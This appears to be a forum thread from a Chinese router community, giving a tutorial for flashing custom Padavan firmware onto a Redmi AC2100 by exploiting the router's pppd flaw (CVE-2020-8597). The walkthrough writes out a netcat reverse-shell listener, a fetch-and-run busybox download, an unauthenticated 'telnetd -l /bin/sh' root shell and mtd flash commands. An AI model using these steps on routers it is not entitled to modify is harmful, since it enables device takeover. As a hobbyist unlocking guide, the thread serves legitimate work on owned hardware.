QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

[AC2100(RM2100)] [2020-05-07]padavan适配红米AC2100,更新单网卡视频刷机教程

火... [复制链接]

请删除微博,谢谢

录了个视频,有需要的可以看一下:https://www.bilibili.com/video/BV1Sk4y1r7H1/楼下有pppoe和scapy等都配置好了的虚拟机打包下载,方便软件源下载困难的人士使用。

小米官网之前的救砖工具红米依然可用,所以随便刷。
设置红米为pppoe拨号,用户名name,密码passwd。用一根网线将红米的wan和紧邻的lan连接,另一根网线连接电脑和剩下一个紧邻的lan(别连到最边上那个)
剩余流程:(用我上传的虚拟机的直接从第二步开始)
1.虚拟机ubuntu20运行sudo apt-get install python3-scapy&&sudo apt install net-tools        并建好pppoe服务器(参考7楼)。
将2楼网盘内的busybox和pppd-cve.py(里面的eth0改为自己的有线网卡名,可用ifconfig测试,如图里我的是ens33)还有剩余的两个固件放到ubuntu任一目录。

2.用我传的虚拟机的可以直接从这开始
有线网卡设置固定ip为192.168.31.177,改ip后记得开关下网卡。在下载目录打开命令行窗口,运行python3 -m http.server 8081 & 建立http服务器。用手机看看 http://192.168.31.177:8081/能否正常打开 ,不能打开就自行检查防火墙,再考虑后面的
该目录打开窗口运行sudo pppoe-server -I ens33 -L 192.168.5.1 -R 192.168.5.5 -N 10 路由器能拨上号后再考虑后面的。
再次打开窗口,运行nc -nvlp 31337
再次打开窗口,运行sudo python3 pppd-cve.py 此时注意运行nc-nvlp 31337的窗口,一但收到连接立刻在nc的窗口里运行(一定要先运行nc再运行python脚本)
cd /tmp&&wget http://192.168.31.177:8081/busybox&&chmod a+x ./busybox&&./busybox telnetd -l /bin/sh
运行成功如图

如果连接中途断开,则重复运行上面最后两步(指python和nc-nvlp两个窗口)。完成后运行telnet 192.168.31.1,依次运行
wget http://192.168.31.177:8081/r3g.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd -r write r3g.bin kernel1

运行完成后会进入op(用户名root 密码admin)此时可切换到windows。如果拿不到ip,请手动设置有线网卡ip为192.168.1.23,网关为192.168.1.1,网关掩码255.255.255.0。winscp将老毛子固件传到tmp目录下,用putty之类的连路由器运行
mtd -r write /tmp/redmi.trx kernel

自动重启进入老毛子。

5G可开160MHZ

速度如下

固件主要集成了网易云和低调上网

你说的很对,我赞同你的说法。: 5.0
你说的很对,我赞同你的说法。: 5
大佬你好,小米路由负责人想和您认识一下,看到的话,可以点进这个链接去微博和他联系。https://weibo.com/1685482501/JccWir6ju?type=comment&pcfrom=msgbox#_r   发表于 2020-7-21 12:19
大佬你好,小米路由负责人想和您认识一下,看到的话,可以点进这个链接去微博和他联系。https://weibo.com/1685482501/Jcc ... x#_rnd1595304773196  发表于 2020-7-21 12:17
加入锐捷认2证后的版本,有明显掉速,你应该更改过什么。我换回原来的版本速度正常  发表于 2020-4-30 19:17
大佬,如果149-161信道的无线,调成和36-48鸡血一样屌,那就真的成一代神机了。请问编译的时候可以做到吗?  发表于 2020-4-27 23:00
你说的很对,我赞同你的说法。: 5
实测数据吊打K2P,数据细节已在我帖子更新,欢迎来讨论!  发表于 2020-4-27 19:58

评分

血滴子 + 1 送你一块“恩山”牌肥皂,喏,就在你脚下、捡一下吧……
yuick + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
rodneyxp2002 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
这波怎么说 + 1 强大的恩山!(以下重复1万次)
sidlong + 1 学习到
A六度亿通数码 -1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
rneko + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
Poil_GGinChi + 1 生活不易,相遇也不易,既然这样,让我们成为朋友一起面朝大海、花开花落……
andychancn + 1 什么时候加多拨就完美了....
byxiaozhi + 1 一看就是觉得高端、大气、上档次!
benzikk + 1 恩山全体路由党向你学习!
iwo + 1 恩山全体路由党向你学习!
kkbbkiller + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
狐狸骑马桶 + 1 按照新教程很快就刷好固件了,大神真是牛
297118122 + 1 ss节点不能启用要怎么搞
koliner + 1 强大的恩山!(以下重复1万次)
kele.ice + 1 一看就是觉得高端、大气、上档次!
二到正无穷 + 1 感谢你的分享,无论怎样,你都是最无私的人!来,说说,你E盘上还有啥一起给我吧!
honglt + 1 一晚上终于搞定 还是两台电脑比较容易
jzhf + 1 血洗X讯啊
1come + 1 请问使用的是什么版本的padavan
4088942 + 1 网安大神牛逼
5112075 + 1 利用了CVE-2020-8597,不知ax3600是否可以效仿
awp8008 + 1 给力,加油
8MILERD + 1 How ever,this is JB useful!
hanwckf + 1 2333
青木丶 + 1 恩山全体路由党向你学习!

我的恩山、我的无线 The best wifi forum is right here.

https://blog.csdn.net/rheostat/article/details/806977 桥接参考这个。运行以下命令可安装pppoe服务器,启动前用网盘文件夹pppoe文件夹的内容替换/etc/ppp下的三个文件。(运行sudo nautilus,用这个文件管理器替换)
wget -c https://dianne.skoll手动替换为点ca/projects/rp-pppoe/download/rp-pppoe-3.13.tar.gz

sudo tar zxvf rp-pppoe-3.13.tar.gz -C /opt/
sudo chown -R root:root /opt/rp-pppoe-3.13/

sudo apt-get install build-essential

sudo /opt/rp-pppoe-3.13/go (这步一路回车,防火墙那好像选0好点)

sudo killall pppoe-server
sudo pppoe-server -I ens33 -L 192.168.5.1 -R 192.168.5.5 -N 10 (ens33改为自己的网卡名)

我的恩山、我的无线 The best wifi forum is right here.

配好环境的ubuntu,密码739870,个人用的虚拟机是VMware 15.5 pro.有关脚本和固件在download目录内
链接: https://pan.baidu.com/s/1OELQj1OOwE9MqFAQscllmQ 提取码: 2ue2
固件和脚本等下载
https://sssddddff.lanzous.com/ibzsmij

主持楼主,先用看看  详情 回复 发表于 2021-12-27 01:37

沙发 谢谢大佬。ac2100有救了

抓紧下载一下了。。小米路由器AC2100(R2100)  小米路由器AC2100(R2100)  这个型号的对吧。

红米不是小米  详情 回复 发表于 2020-4-26 00:37

一看到nc -nvlp 31337,我就觉得熟悉了。

2.4g速度有多少呢

刚拿手机测了下100Mbps上下波动 5G可以轻松跑满到520Mbps  详情 回复 发表于 2020-4-25 16:14

老哥这个多拨怎么样

厉害,搞得我都有心去搞一个AC2100过渡了,而且还可以开160mhz,感觉会很不错的样子

太难,看不懂

感同身受 慢慢学习吧  详情 回复 发表于 2022-10-29 11:57

太难了,裂开

nb  666...

杯了呀 这都可以

OP默认设置密码了没?怎么连

admin  详情 回复 发表于 2020-4-24 23:28

Dane_Z 发表于 2020-4-24 23:26
OP默认设置密码了没?怎么连

admin      

ssh的root用户默认密码有吗 使用admin账号登陆没有权限  详情 回复 发表于 2020-4-28 09:42